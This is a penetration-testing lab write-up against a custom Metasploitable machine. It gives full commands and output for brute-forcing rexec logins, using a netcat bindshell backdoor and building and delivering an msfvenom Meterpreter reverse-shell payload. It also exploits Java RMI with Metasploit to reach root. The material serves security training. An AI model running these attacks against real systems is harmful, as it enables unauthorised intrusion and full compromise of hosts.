👾Metasploitable (Custom 3)

This is a custom vulnerable machine for a penetration testing module. I had to perform certain tasks and gain root privileges within a given set of time.

Rexec-Brute NSE

Enumeration: "It Worked" Rexec-Brute (NSE)

Netcat / Msfvenom

Exploitation: "Succeeded" Netcat / Msfvenom

Java RMI

Exploitation: "Succeeded" Java RMI (Msfconsole)

Recon: N.A

Reconnaissance was not needed for this exercise

Scanning: Nmap

The target IP address was 192.168.249.150

-p-: All ports
--open: Only show open (or possibly open) ports
-sV: Probe open ports to determine service/version info
-A: Enable OS detection, version detection, script scanning, and traceroute
-O: Enable OS detection
-oA: Output in the three major formats at once

┌──(kali㉿kali)-[~/custom3]
└─$ nmap -sV -p- --open 192.168.249.150 -vvvv -oA c3Open
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-31 18:06 +08
NSE: Loaded 45 scripts for scanning.
Initiating Ping Scan at 18:06
Scanning 192.168.249.150 [2 ports]
Completed Ping Scan at 18:06, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 18:06
Completed Parallel DNS resolution of 1 host. at 18:06, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 18:06
Scanning 192.168.249.150 [65535 ports]
Discovered open port 37535/tcp on 192.168.249.150
Discovered open port 1524/tcp on 192.168.249.150
Discovered open port 512/tcp on 192.168.249.150
Discovered open port 37310/tcp on 192.168.249.150
Discovered open port 513/tcp on 192.168.249.150
Discovered open port 514/tcp on 192.168.249.150
Discovered open port 42503/tcp on 192.168.249.150
Discovered open port 58931/tcp on 192.168.249.150
Completed Connect Scan at 18:06, 2.61s elapsed (65535 total ports)
Initiating Service scan at 18:06
Scanning 8 services on 192.168.249.150
Completed Service scan at 18:08, 126.19s elapsed (8 services on 1 host)
NSE: Script scanning 192.168.249.150.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 18:08
Completed NSE at 18:08, 0.01s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 18:08
Completed NSE at 18:08, 0.02s elapsed
Nmap scan report for 192.168.249.150
Host is up, received conn-refused (0.0011s latency).
Scanned at 2022-03-31 18:06:17 +08 for 129s
Not shown: 65505 closed tcp ports (conn-refused), 22 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE    REASON  VERSION
512/tcp   open  exec       syn-ack netkit-rsh rexecd
513/tcp   open  login?     syn-ack
514/tcp   open  tcpwrapped syn-ack
1524/tcp  open  bindshell  syn-ack Bash shell (**BACKDOOR**; root shell)
37310/tcp open  status     syn-ack 1 (RPC #100024)
37535/tcp open  nlockmgr   syn-ack 1-4 (RPC #100021)
42503/tcp open  mountd     syn-ack 1-3 (RPC #100005)
58931/tcp open  java-rmi   syn-ack GNU Classpath grmiregistry
Service Info: Host: custom3; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 129.12 seconds

👍 Enumeration: "It Worked" Rexec-Brute (NSE)

There was a hint to investigate port 512

PORT      STATE SERVICE  VERSION
512/tcp   open  exec       syn-ack netkit-rsh rexecd

nmap -sV -p 512 --script=rexec-brute 192.168.249.150

──(kali㉿kali)-[~/custom3]
└─$ nmap -sV -p 512 --script=rexec-brute 192.168.249.150
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-31 18:19 +08
Nmap scan report for 192.168.249.150
Host is up (0.00054s latency).

PORT    STATE SERVICE VERSION
512/tcp open  exec    netkit-rsh rexecd
| rexec-brute: 
|   Accounts: 
|     root:root - Valid credentials
|     netadmin:netadmin - Valid credentials
|     guest:guest - Valid credentials
|     user:user - Valid credentials
|     web:web - Valid credentials
|     sysadmin:sysadmin - Valid credentials
|     administrator:administrator - Valid credentials
|     webadmin:webadmin - Valid credentials
|     admin:admin - Valid credentials
|     test:test - Valid credentials
|_  Statistics: Performed 13 guesses in 1 seconds, average tps: 13.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.35 seconds

🤔💭 It seems like the above results are using the default login credentials

The next task was to find out what information was being transferred when accessing the port

msfconsole
search rexec

┌──(kali㉿kali)-[~/custom3]
└─$ msfconsole
msf6 > search rexec

Matching Modules
================

   #  Name                                     Disclosure Date  Rank       Check  Description
   -  ----                                     ---------------  ----       -----  -----------
   0  exploit/multi/misc/consul_rexec_exec     2018-08-11       excellent  Yes    Hashicorp Consul Remote Command Execution via Rexec
   1  auxiliary/scanner/rservices/rexec_login                   normal     No     rexec Authentication Scanner


Interact with a module by name or index. For example info 1, use 1 or use auxiliary/scanner/rservices/rexec_login

msf6 >

use auxiliary/scanner/rservices/rexec_login

msf6 > use auxiliary/scanner/rservices/rexec_login
msf6 auxiliary(scanner/rservices/rexec_login) > set password root
password => root
msf6 auxiliary(scanner/rservices/rexec_login) > set rhosts 192.168.249.150
rhosts => 192.168.249.150
msf6 auxiliary(scanner/rservices/rexec_login) > set username root
username => root
msf6 auxiliary(scanner/rservices/rexec_login) > options

Module options (auxiliary/scanner/rservices/rexec_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   DB_SKIP_EXISTING  none             no        Skip existing credentials stored in the current database (Accepted: none, user, user&real
                                                m)
   ENABLE_STDERR     false            yes       Enables connecting the stderr port
   PASSWORD          root             no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   RHOSTS            192.168.249.150  yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metaspl
                                                oit
   RPORT             512              yes       The target port (TCP)
   STDERR_PORT                        no        The port to listen on for stderr
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads (max one per host)
   USERNAME          root             no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts

msf6 auxiliary(scanner/rservices/rexec_login) >

msf6 auxiliary(scanner/rservices/rexec_login) > run

[*] 192.168.249.150:512   - 192.168.249.150:512 - Starting rexec sweep
[*] 192.168.249.150:512   - 192.168.249.150:512 - Attempting rexec with username:password 'root':'root'
[-] 192.168.249.150:512   - 192.168.249.150:512 - [1/1] - Result: xxxxx xxx xxx?
[*] 192.168.249.150:512   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/rservices/rexec_login) >

The secret message was revealed as the following:

[-] 192.168.249.150:512   - 192.168.249.150:512 - [1/1] - Result: xxxxx xxx xxx?

👍 Exploitation: "Succeeded" Netcat / Msfvenom

The next task requires a Meterpreter session. Hence I will make use of the following vulnerability:

PORT      STATE SERVICE    REASON  VERSION
1524/tcp  open  bindshell  syn-ack Bash shell (**BACKDOOR**; root shell)

(Remote Host) Initiating a connection to the port 1524 on the remote host:

nc 192.168.249.150 1524
whoami

┌──(kali㉿kali)-[~/custom3]
└─$ nc 192.168.249.150 1524                             
root@custom3:/# whoami
root
root@custom3:/#

(Local Host 👿) Creating a payload using Msfvenom:

msfvenom -p linux/x86/meterpreter_reverse_tcp lhost=192.168.249.140 lport=8999 -f elf -o payload.elf

┌──(kali㉿kali)-[~/custom3]
└─$ msfvenom -p linux/x86/meterpreter_reverse_tcp lhost=192.168.249.140 lport=8999 -f elf -o payload.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 1106792 bytes
Final size of elf file: 1106792 bytes
Saved as: payload.elf

(Remote Host 🙈 ) Preparing the netcat listener to receive the file 'payload.elf'

netcat -nlvp 9899 > payload.elf

┌──(kali㉿kali)-[~/custom3]
└─$ nc 192.168.249.150 1524                             
root@custom3:/# whoami
root
root@custom3:/# netcat -nlvp 9899 > payload.elf
listening on [any] 9899 ...

(Local Host 👿) Sending the file from the localhost:

netcat -w 2 192.168.249.150 9899 < payload.elf

┌──(kali㉿kali)-[~/custom3]
└─$ netcat -w 2 192.168.249.150 9899 < payload.elf

(Remote Host 🙈) Execute the 'ls' command to verify if the file 'payload.elf' has been successfully transferred from the local host to the remote host

connect to [192.168.249.150] from (UNKNOWN) [192.168.249.140] 34790
root@custom3:/# ls
bin
boot
cdrom
dev
etc
home
initrd
initrd.img
lib
lost+found
media
mnt
nohup.out
opt
payload.elf
proc
root
sbin
srv
sys
tmp
usr
var
vmlinuz
root@custom3:/#

(Local Host 👿) Start a listener using Msfconsole:

msfconsole
use exploit/multi/handler
set lhost 192.168.249.140
set lport 8999 (the same port number as the payload created using Msfvenom)
options

┌──(kali㉿kali)-[~/custom3]
└─$ msfconsole                                                                                          
                                                  
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x86/meterpreter_reverse_tcp
payload => linux/x86/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.249.140
lhost => 192.168.249.141
msf6 exploit(multi/handler) > set lport 8999
lport => 8999
msf6 exploit(multi/handler) > options
                                                                                                                                           
Module options (exploit/multi/handler):                                                                                                    
                                                                                                                                           
   Name  Current Setting  Required  Description                                                                                            
   ----  ---------------  --------  -----------                                                                                            
                                                                                                                                           
                                                                                                                                           
Payload options (linux/x86/meterpreter_reverse_tcp):                                                                                       

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.249.140  yes       The listen address (an interface may be specified)
   LPORT  8999             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.249.140:8999

(Remote Host 🙈) I will need to change the file permissions for 'payload.elf'

ls -la | grep payload.elf

root@custom3:/# ls -la | grep payload.elf
-rw-r--r--   1 root root 1106792 Mar 31 08:15 payload.elf

chmod 777 payload.elf
ls -la | grep payload.elf

root@custom3:/# chmod 777 payload.elf
root@custom3:/# ls -la | grep payload.elf
-rwxrwxrwx   1 root root 1106792 Mar 31 08:15 payload.elf
root@custom3:/#

Executing the file 'payload.elf'

./payload.elf

root@custom3:/# ./payload.elf

(Remote Host 🙈) The following is an example of using a n unsuitable payload:

bash: [5694: 3] tcsetattr: Invalid argument
Segmentation fault
root@custom3:/#

📔 Note: If by any chance that the output error is 'segmentation fault', it could be due to the usage of a staged payload 'linux/x86/meterpreter/everse_tcp' instead of a stageless payload 'linux/x86/meterpreter_reverse_tcp'

Reference: https://github.com/rapid7/metasploit-framework/issues/12142#issuecomment-516057212

(Local Host 👿) After executing the payload on the remote host, I gained a Meterpreter session on my local host machine

getuid
sysinfo

[*] Started reverse TCP handler on 192.168.249.140:8999 
[*] Meterpreter session 1 opened (192.168.249.140:8999 -> 192.168.249.150:60321 ) at 2022-03-31 20:29:58 +0800

meterpreter > getuid
Server username: root                                                                                                                      
meterpreter > sysinfo                                                                                                                      
Computer     : 192.168.249.150                                                                                                             
OS           : Ubuntu x8.04 (Linux 2.6.24-16-server)                                                                                       
Architecture : i686                                                                                                                        
BuildTuple   : i486-linux-musl                                                                                                             
Meterpreter  : x86/linux                                                                                                                   
meterpreter >

😄 Executing 'getuid' reflected that the Sever username is 'root'!

👍 Exploitation: "Succeeded" Java RMI (Msfconsole)

I will attempt to exploit the Telnet service on port 23 using the log in credentials that I managed to acquire from earlier

PORT      STATE SERVICE  VERSION
58931/tcp open  java-rmi GNU Classpath grmiregistry

msfconsole

┌──(kali㉿kali)-[~/custom3]
└─$ msfconsole                                                                                          
                                                                                                                                                                            
msf6 >

search type:exploit java rmi

msf6 > search type:exploit java rmi

Matching Modules
================

   #  Name                                                             Disclosure Date  Rank       Check  Description
   -  ----                                                             ---------------  ----       -----  -----------
   0  exploit/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce  2019-05-22       excellent  Yes    Atlassian Crowd pdkinstall Unauthenticated Plugin Upload RCE
   1  exploit/multi/misc/java_jmx_server                               2013-05-22       excellent  Yes    Java JMX Server Insecure Configuration Java Code Execution
   2  exploit/multi/misc/java_rmi_server                               2011-10-15       excellent  Yes    Java RMI Server Insecure Default Configuration Java Code Execution
   3  exploit/multi/browser/java_rmi_connection_impl                   2010-03-31       excellent  No     Java RMIConnectionImpl Deserialization Privilege Escalation
   4  exploit/multi/browser/java_signed_applet                         1997-02-19       excellent  No     Java Signed Applet Social Engineering Code Execution
   5  exploit/multi/http/jenkins_metaprogramming                       2019-01-08       excellent  Yes    Jenkins ACL Bypass and Metaprogramming RCE
   6  exploit/linux/misc/jenkins_java_deserialize                      2015-11-18       excellent  Yes    Jenkins CLI RMI Java Deserialization Vulnerability
   7  exploit/multi/browser/firefox_xpi_bootstrapped_addon             2007-06-27       excellent  No     Mozilla Firefox Bootstrapped Addon Social Engineering Code Execution
   8  exploit/multi/http/totaljs_cms_widget_exec                       2019-08-30       excellent  Yes    Total.js CMS 12 Widget JavaScript Code Injection


Interact with a module by name or index. For example info 8, use 8 or use exploit/multi/http/totaljs_cms_widget_exec

msf6 >

use exploit/multi/misc/java_rmi_server
set rhosts 192.168.249.150
set rport 58931
set lhost 192.168.249.140
set lport 8889

msf6 > use exploit/multi/misc/java_rmi_server
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
msf6 exploit(multi/misc/java_rmi_server) > set rhosts 192.168.249.150
rhosts => 192.168.249.150
msf6 exploit(multi/misc/java_rmi_server) > set rport 58931
rport => 58931
msf6 exploit(multi/misc/java_rmi_server) > set lhost 192.168.249.140
lhiost => 192.168.249.140
msf6 exploit(multi/misc/java_rmi_server) > set lport 8889
lport => 8889
msf6 exploit(multi/misc/java_rmi_server) > options
Module options (exploit/multi/misc/java_rmi_server):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HTTPDELAY  10               yes       Time that the HTTP Server will wait for the payload request
   RHOSTS     192.168.249.150  yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      58931            yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or
                                          0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL for incoming connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                     no        The URI to use for this exploit (default is random)


Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.249.140  yes       The listen address (an interface may be specified)
   LPORT  8889             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Generic (Java Payload)


msf6 exploit(multi/misc/java_rmi_server) >

sf6 exploit(multi/misc/java_rmi_server) > run

[*] Started reverse TCP handler on 192.168.249.140:8889 
[*] 192.168.249.150:58931 - Using URL: http://0.0.0.0:8080/ggqTzR
[*] 192.168.249.150:58931  - Local IP: http://192.168.249.140:8080/ggqTzR
[*] 192.168.249.150:58931 - Server started.
[*] 192.168.249.150:58931 - Sending RMI Header...
[*] 192.168.249.150:58931 - Sending RMI Call...
[*] 192.168.249.150:58931 - Replied to request for payload JAR
[*] Sending stage (58053 bytes) to 192.168.249.150
[*] Meterpreter session 1 opened (192.168.249.140:8889 -> 192.168.249.150:60997 ) at 2022-03-31 15:42:26 +0800
[-] 192.168.249.150:58931 - Exploit failed: RuntimeError Timeout HTTPDELAY expired and the HTTP Server didn't get a payload request
[*] 192.168.249.150:58931 - Server stopped.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/misc/java_rmi_server) >

🤔💭 I am getting the following errors:

[-] 192.168.249.150:58931 - Exploit failed: RuntimeError Timeout HTTPDELAY expired and the HTTP Server didn't get a payload request
[*] 192.168.249.150:58931 - Server stopped.
[*] Exploit completed, but no session was created.

🤔💭 However it did mention that 'Meterpreter session 1 opened'. Hence, I executed 'sessions' just to check if there was indeed one

sessions

msf6 exploit(multi/misc/java_rmi_server) > sessions

Active sessions
===============

  Id  Name  Type                    Information   Connection
  --  ----  ----                    -----------   ----------
  1         meterpreter java/linux  root @ custom3 192.168.249.140:8889 -> 192.168.249.150:60997  (192.168.249.150)

msf6 exploit(multi/misc/java_rmi_server) >

sessions 1
getuid
sysinfo

msf6 exploit(multi/misc/java_rmi_server) > sessions 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer    : custom3
OS          : Linux 2.6.24-16-server (i386)
Meterpreter : java/linux
meterpreter > Interrupt: use the 'exit' command to quit
meterpreter >

😄 Executing 'getuid' reflected that the Sever username is 'root'!

PreviousMetasploitable (Custom 2)NextWindows

Last updated 3 years ago

hashtagContents

hashtagRecon: N.A

hashtagScanning: Nmap

hashtag👍 Enumeration: "It Worked" Rexec-Brute (NSE)

hashtag👍 Exploitation: "Succeeded" Netcat / Msfvenom

hashtag👍 Exploitation: "Succeeded" Java RMI (Msfconsole)

Contents

Recon: N.A

Scanning: Nmap

👍 Enumeration: "It Worked" Rexec-Brute (NSE)

👍 Exploitation: "Succeeded" Netcat / Msfvenom

👍 Exploitation: "Succeeded" Java RMI (Msfconsole)